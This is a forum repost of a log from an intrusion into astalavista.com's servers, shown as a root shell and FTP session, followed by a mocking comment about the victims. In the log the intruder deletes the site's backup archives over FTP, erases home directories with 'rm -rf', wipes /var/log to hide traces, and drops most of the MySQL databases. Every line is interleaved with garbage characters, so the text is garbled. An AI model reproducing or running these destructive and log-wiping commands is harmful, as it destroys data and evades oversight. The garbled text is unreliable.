-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
4 Z6 G; ~2 T( @+ w0 h# P-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2. _; e1 L7 B: e7 E1 b( ~0 P$ ^
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
* i& j0 {2 a5 h* b-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
, K/ ~9 a/ S( U- }' |/ `-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar3 C; U8 A/ ]( d# e" L3 G0 o, e
[snip]
# n9 t0 c P5 H226 Transfer complete.
1 G) d) S/ E/ b0 ~5 ^2 e* {ftp> mdelete *' k$ N% [ z# ? m
ftp> ls -la
2 E" @/ S& H% _& O5 R; o$ X227 Entering Passive Mode (212,254,194,163,2,193)
W' S k+ u7 N5 D1 f5 Y150 Opening BINARY mode data connection for ‘file list’.
! P$ X' d- k* ]1 W a8 A# N226 Transfer complete.) ?* z/ P9 [. L4 d! \* M! j2 `
ftp>3 f: J9 {" l4 E, u! L
3 M3 k6 M. P# u; O' |, n" Vsh-3.2# cd /home
( ?1 L# c$ |7 a! X2 I3 F7 y9 Dsh-3.2# ls -la' [! @" R( t! n
total 120
6 P* ~, @! P- ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
. s9 B2 b7 L" }0 k, j2 O4 R3 F& idrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
( `; R8 ^( u/ D: {5 D9 h2 g' Jdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
" U$ c+ V5 Q8 `0 P- j; z" @9 H-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
( I, `/ g8 H8 S/ [3 V-rw——- 1 root root 8192 Jun 3 02:45 aquota.user2 G* U2 x- S) N; ?2 D
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
1 j8 I* C# X% B) U0 Pdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup, V7 l) ?$ i c, d; q9 ? N5 g z
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141619 F0 I) x6 A1 ?5 C0 w9 Q( {4 e& A2 O
drwx–x–x 10 com com 4096 Apr 28 12:40 com
( e7 e Q) L/ @8 d) u1 u, M9 Sdrwxr-xr-x 2 root root 4096 May 17 2007 ftp* {. F' \6 \! {, \
drwx—— 3 jon jon 4096 Sep 21 2007 jon
1 ~! ~$ p4 ]- g5 o' ^7 O, c" Idrwx—— 2 root root 16384 Sep 11 2007 lost+found2 `$ {( c. z" W: q
drwxr-xr-x 2 root root 4096 Sep 14 2007 my0 b) F5 f4 Q, X7 _
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata/ Q! o5 F6 u( B$ Z7 ?2 h
drwx—— 2 jon jon 4096 Sep 15 2007 test
6 h% Z3 S0 j0 X6 p( tdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
" a7 L4 [& y8 m0 g3 j/ s6 U) o! M# p2 h
sh-3.2# rm -rf backup/
: ?4 {" [- m2 e$ Psh-3.2# rm -rf backup.14161/* h- k$ m3 k7 _" g) X8 @( G, x. L
sh-3.2# rm -rf ftp/
2 a' z9 x& ?$ k* i" V9 vsh-3.2# rm -rf jon/
( `% N$ D2 M, U) r9 v2 Lsh-3.2# rm -rf my/
' r$ d0 P5 A# T4 d/ S' T: w1 ~sh-3.2# rm -rf mysqldata/
( z$ F( l# s1 g6 _" O: \4 S. ~0 Fsh-3.2# rm -rf test/2 t9 ~9 s* }+ i0 N
sh-3.2# rm -rf tmp/* M" p* A1 b# k* R9 }/ J i- x
sh-3.2# cd ~, e' F. T. \( c: m/ P; T3 C
sh-3.2# rm -rf *! A m3 M8 Q( a# X
sh-3.2# rm -rf /var/log/
* w, x' y7 k* |' Brm: cannot remove directory `/var/log//proftpd’: Directory not empty/ Z! }1 R: j2 v
sh-3.2# rm -rf /home/*, K: w) Y; j3 X) q2 Z1 h; y
sh-3.2# mysql
- z3 ?: r5 N6 u9 EWelcome to the MySQL monitor. Commands end with ; or \g.# O/ `; \" W; Z' x. E. r( [
Your MySQL connection id is 407156- W" Z3 h; Q1 x. d- m
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
6 u/ m R3 ]; `, C! P6 G0 H9 u! s ]" h/ d$ R8 Z, c _" f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
$ B& Y$ Q3 x' p3 C% l" e# `# E5 l& K" Q5 l. t5 k; T4 t0 \
mysql> show databases;3 m. O9 r& s$ _
+———————–+
$ f, ^, E# D- m7 d% `( o! l# || Database |
# o$ _2 n2 F7 I+———————–+. {2 ]0 r- ^6 v4 O ^, {; [( R, d
| information_schema |- i6 F T- u P. G! L
| astanet_ads |
) Y: |6 w/ l0 R| astanet_mailing_lists |3 _1 J9 e( D+ ?* G
| astanet_mediawiki |) Q! N' {7 }% Z) t3 Q
| astanet_membersystem |
1 ^1 [1 Q( [) a( N( J| com_contrexx |
* M4 }0 K: a1 x/ W| com_contrexx2 |
# ~! s! y; K4 q7 O3 @| com_contrexx2_live |
6 u& [7 x& |5 d| da_roundcube |2 Y$ \0 m9 J) g' { w0 l; I) [( Y
| dolphin |3 @, z% ^. X, i# Y! P9 w
| ideapool |
]# _/ B: h; `| mysql |. s3 F, A: ?4 C: x& ^! Z5 H
| test |
9 e7 W, O1 L: j% g0 X) T| yourmaster |4 `, h/ C4 F) F# T1 n6 N
+———————–+
- h6 L) ? A+ p( s; e% |/ D, c14 rows in set (0.03 sec)
% b$ @+ }, W# f D
$ j7 b- I0 n6 \: j; Dmysql> drop database astanet_membersystem;
1 h# l8 V% R% S* S3 g+ RdroQuery OK, 46 rows affected (0.81 sec)4 I G5 E2 {4 L! P+ n
7 s$ L, T& ?+ t+ z7 c7 f
mysql> drop database com_contrexx;( g( h! P' _1 z
Query OK, 211 rows affected (2.72 sec); A* q4 V: H Y7 V
4 x1 n5 ~# h0 j. G# q) Hmysql> drop database com_contrexx2;
2 c, U' j/ @& B0 i, X' K$ dQuery OK, 237 rows affected (2.23 sec)
5 ], }8 v/ B: z7 H! [% j4 y+ {5 x! [& c
mysql> drop database com_contrexx2_live;
! {+ g" \! q( b6 }Query OK, 227 rows affected (7.63 sec)
" ~* }% g0 v- X6 e! l/ A
' _. V& ?. _5 P% nmysql> drop database ideapool;3 t0 X( u$ L) `7 r+ _2 D
Query OK, 69 rows affected (0.19 sec)
2 m$ b3 l0 h2 E6 [$ K) K V8 W
& I! Q* E- H6 x2 hmysql> drop database yourmaster;
! N% k0 [* S2 b; ?; T$ g0 MQuery OK, 158 rows affected (0.55 sec)2 E& e2 @' ?- n/ x
" V; E7 s$ f" K) H* m& p) N" }
mysql> drop database astanet_ads;
! x& O8 r& r# oQuery OK, 9 rows affected (0.11 sec)
, l5 A8 _$ [, s; {( o& O
5 ^/ ?& O) ]5 h( S' I0 N: p8 ~, omysql> drop database astanet_mailing_lists;
- z5 z4 Y& i5 ]* L- l6 \5 `1 A; a# bQuery OK, 24 rows affected (1.47 sec)
# c/ `% A1 o) x& l
9 W6 j6 i1 [3 K2 imysql> drop database astanet_mediawiki;
+ R5 X0 t6 B \9 U PQuery OK, 31 rows affected (0.51 sec)
$ W1 a) l- @" }+ q# [9 q$ ]/ Y8 u3 o: A. |, ]4 Q
mysql> show databases;
. ?+ W" J- Q5 W$ b9 @1 k3 t! z4 D+——————–+' F/ L0 r9 e; d- O" y) @
| Database |
$ b+ [0 O# E9 P. U4 J! d4 j/ U+——————–+( m$ ?* Z4 y5 m3 L* j
| information_schema |
8 o0 Z6 \" ], U% X| da_roundcube |+ H, T- E/ ~! s" K& v& Q/ I4 G
| dolphin |
0 P, }7 [, ?- W| mysql |
; P& _" s8 X. {: ~ q) J o" Q| test |
+ y1 b1 Q0 a# r) E+ o+——————–+( j. e8 Y" N( S) j- t/ G
5 rows in set (0.00 sec)
$ @& y$ r6 Y) f5 O- R8 Z$ ~2 F. f3 y, Q/ z; N# v% Y! `5 B: M
What a journey! We’re not sure exactly why the “Terminator” had any influence on4 h3 n- d2 J) T7 [" ?# Y6 v9 |6 U6 o
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
" v/ x- @& z# uwrong to say this pack of morons *wont be back*.( q1 H; G# j, F4 [
|
发表于 2012-11-6 21:07:34
收藏
支持
反对